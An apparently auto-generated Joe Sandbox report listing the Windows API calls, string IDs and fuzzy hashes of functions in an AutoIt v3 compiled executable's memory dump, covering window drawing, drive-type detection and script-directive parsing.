                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00EFA937
                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFA97F
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00EFA98B
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EFA9C5
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFA9E7
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFA9FA
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAA05
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00EFAA0E
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAA1D
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00EFAA26
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAA2D
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00EFAA38
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00EFAA4A
                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F2D9BC,00000000), ref: 00EFAA60
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00EFAA70
                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00EFAA96
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00EFAAB5
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAAD7
                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFACC4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                  • Opcode ID: fa2ec70a326ef2a0b77397a36c0d355a40b01dc657178e6bc6d0eb8dc95846ae
                                                                                                                                  • Instruction ID: 823190866ffd8638f2839a6c20e0e162919a3e5b167d8844c4ec421ced985c04
                                                                                                                                  • Opcode Fuzzy Hash: fa2ec70a326ef2a0b77397a36c0d355a40b01dc657178e6bc6d0eb8dc95846ae
                                                                                                                                  • Instruction Fuzzy Hash: 9D028171900218EFDB14DF64CD89EAE7BB9FF49310F148159F915AB2A0DB70AD41DB60
                                                                                                                                  Function 00F0D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00F0D0EB
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F0D11C
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00F0D128
                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00F0D142
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00F0D151
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0D17C
                                                                                                                                  • GetSysColor.USER32(00000010), ref: 00F0D184
                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00F0D18B
                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00F0D19A
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F0D1A1
                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00F0D1EC
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 00F0D21E
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0D249
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColor.USER32(00000012), ref: 00F0D3BE
                                                                                                                                    • Part of subcall function 00F0D385: SetTextColor.GDI32(?,?), ref: 00F0D3C2
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColorBrush.USER32(0000000F), ref: 00F0D3D8
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColor.USER32(0000000F), ref: 00F0D3E3
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColor.USER32(00000011), ref: 00F0D400
                                                                                                                                    • Part of subcall function 00F0D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0D40E
                                                                                                                                    • Part of subcall function 00F0D385: SelectObject.GDI32(?,00000000), ref: 00F0D41F
                                                                                                                                    • Part of subcall function 00F0D385: SetBkColor.GDI32(?,00000000), ref: 00F0D428
                                                                                                                                    • Part of subcall function 00F0D385: SelectObject.GDI32(?,?), ref: 00F0D435
                                                                                                                                    • Part of subcall function 00F0D385: InflateRect.USER32(?,000000FF,000000FF), ref: 00F0D454
                                                                                                                                    • Part of subcall function 00F0D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0D46B
                                                                                                                                    • Part of subcall function 00F0D385: GetWindowLongW.USER32(00000000,000000F0), ref: 00F0D480
                                                                                                                                    • Part of subcall function 00F0D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0D4A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                  • Opcode ID: 0e37afa50886470d589b202ed5e10da42942e2ed26106f7cc56891ab0f896863
                                                                                                                                  • Instruction ID: 46177f40527c58776af95f23a74683a9cdc1d62e4d2c073b40d9cfa5c058b2a7
                                                                                                                                  • Opcode Fuzzy Hash: 0e37afa50886470d589b202ed5e10da42942e2ed26106f7cc56891ab0f896863
                                                                                                                                  • Instruction Fuzzy Hash: 2191BE72408305FFDB209FA4DC08E5BBBA9FF89321F140A19F962961E0C775D946EB52
                                                                                                                                  Function 00EFA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00EFA42A
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EFA4E9
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EFA527
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EFA539
                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EFA57F
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00EFA58B
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EFA5CF
                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EFA5DE
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EFA5EE
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00EFA5F2
                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EFA602
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EFA60B
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00EFA614
                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EFA642
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EFA659
                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EFA694
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EFA6A8
                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EFA6B9
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EFA6E9
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EFA6F4
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EFA6FF
                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EFA709
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                  • Opcode ID: cfe4dfb3041720cdca015a9e349f3da5d193f51b6d928ac798d5eb0fdf037700
                                                                                                                                  • Instruction ID: fedddffb002aef8695d338ba97fd7f29de99e923be014fbb068bc89071d8b95b
                                                                                                                                  • Opcode Fuzzy Hash: cfe4dfb3041720cdca015a9e349f3da5d193f51b6d928ac798d5eb0fdf037700
                                                                                                                                  • Instruction Fuzzy Hash: 02A161B1A00219BFEB14DBA4DD4AFAE7BB9EF05714F144114F614AB2E0D7B0AD01DB60
                                                                                                                                  Function 00EEE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEE45E
                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00F3DC88,?,\\.\,00F3DBF0), ref: 00EEE54B
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00F3DC88,?,\\.\,00F3DBF0), ref: 00EEE6B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                  • Opcode ID: d79be43aa02dcd9c89dc379be6b72a394edec82ee70e9e8ec59be0eca9d9e72e
                                                                                                                                  • Instruction ID: c1fb694d58e5b7a2c19c519c2d2a8a8411ff65ec5194d208edb4e779db654521
                                                                                                                                  • Opcode Fuzzy Hash: d79be43aa02dcd9c89dc379be6b72a394edec82ee70e9e8ec59be0eca9d9e72e
                                                                                                                                  • Instruction Fuzzy Hash: 68511B3020838EEBC300DF19C855869B7D1BB95748F21A919F946BB391D731EE49E787
                                                                                                                                  Function 00EAC714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                  • Opcode ID: 01914d7c3c2b06f4544a75797acd6bbe920bb14a0c93a23a361fb96d90482833
                                                                                                                                  • Instruction ID: f7b9e0ad3d992c6353cfeb2c0b92679b61f1ab62b755b69f331c8072ed3ac3ac
                                                                                                                                  • Opcode Fuzzy Hash: 01914d7c3c2b06f4544a75797acd6bbe920bb14a0c93a23a361fb96d90482833
                                                                                                                                  • Instruction Fuzzy Hash: 72614B31600311B7DB25EA349D42FFA33D8BF0E744F242029FD55BE182EB61EA52D6A1
                                                                                                                                  Function 00EA48C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32 ref: 00EA4956
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EA4998
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EA49A3
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00EA49AE
                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00EA49B9
                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F1E179
                                                                                                                                  • 6F550200.COMCTL32(?,000000FF,?), ref: 00F1E1B2
                                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00F1E5E0
                                                                                                                                    • Part of subcall function 00EA49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EA4954,00000000), ref: 00EA4A23
                                                                                                                                  • SendMessageW.USER32 ref: 00F1E627
                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F1E63E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2586706302-4108050209
                                                                                                                                  • Opcode ID: 9c7bacf1e7743eb94a3c4d903e0fa8c6ce1eb0eeea91af8e6989bc51e7f82c9d
                                                                                                                                  • Instruction ID: acab18a022e113c874828618ac8d9e953a01df87ece8c149c29d89b8ebce25d0
                                                                                                                                  • Opcode Fuzzy Hash: 9c7bacf1e7743eb94a3c4d903e0fa8c6ce1eb0eeea91af8e6989bc51e7f82c9d
                                                                                                                                  • Instruction Fuzzy Hash: 0512B370A00202DFDB24CF14C884BE6BBE5BF89314F184569F995DB292C771EC96EB91
                                                                                                                                  Function 00F06189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,00F3DBF0), ref: 00F06245
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                                  • Opcode ID: 14aab43935c5c088ec3252d6a1fb53dd2259f7a577675efb384e4e8713cb2663
                                                                                                                                  • Instruction ID: 04121f696b878dac95fe51ce57f149260ac0124f5048515b3e5cdb900c44644d
                                                                                                                                  • Opcode Fuzzy Hash: 14aab43935c5c088ec3252d6a1fb53dd2259f7a577675efb384e4e8713cb2663
                                                                                                                                  • Instruction Fuzzy Hash: C6C1A9342042018BCB08EF14C851AAE77D6AF59354F185469F882AF3D7DB31ED5AFB82
                                                                                                                                  Function 00F0D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00F0D3BE
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00F0D3C2
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F0D3D8
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00F0D3E3
                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00F0D3E8
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00F0D400
                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0D40E
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00F0D41F
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00F0D428
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00F0D435
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0D454
                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0D46B
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00F0D480
                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0D4A8
                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F0D4CF
                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00F0D4ED
                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00F0D4F8
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00F0D506
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00F0D50E
                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F0D522
                                                                                                                                  • SelectObject.GDI32(?,00F0D0B5), ref: 00F0D539
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00F0D544
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00F0D54A
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00F0D54F
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00F0D555
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00F0D55F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                  • Opcode ID: 239a60a825d49dca78748c1efcf65398a7ee0fb20a809d51c4193ef6786f7297
                                                                                                                                  • Instruction ID: 88d00c2492087bee83a618acf59d643e3dafe6d8f4de4250f36572d3c1ba9b3a
                                                                                                                                  • Opcode Fuzzy Hash: 239a60a825d49dca78748c1efcf65398a7ee0fb20a809d51c4193ef6786f7297
                                                                                                                                  • Instruction Fuzzy Hash: 72512B72901208AFDF20DFA8DC49EAEBBB9FF08320F244515F915AB2A1D7759941EF50
                                                                                                                                  Function 00F0B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F0B5C0
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F0B5D1
                                                                                                                                  • CharNextW.USER32(0000014E), ref: 00F0B600
                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F0B641
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F0B657
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F0B668
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F0B685
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00F0B6D7
                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F0B6ED
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F0B71E
                                                                                                                                  • _memset.LIBCMT ref: 00F0B743
                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F0B78C
                                                                                                                                  • _memset.LIBCMT ref: 00F0B7EB
                                                                                                                                  • SendMessageW.USER32 ref: 00F0B815
                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F0B86D
                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00F0B91A
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00F0B93C
                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00F0B986
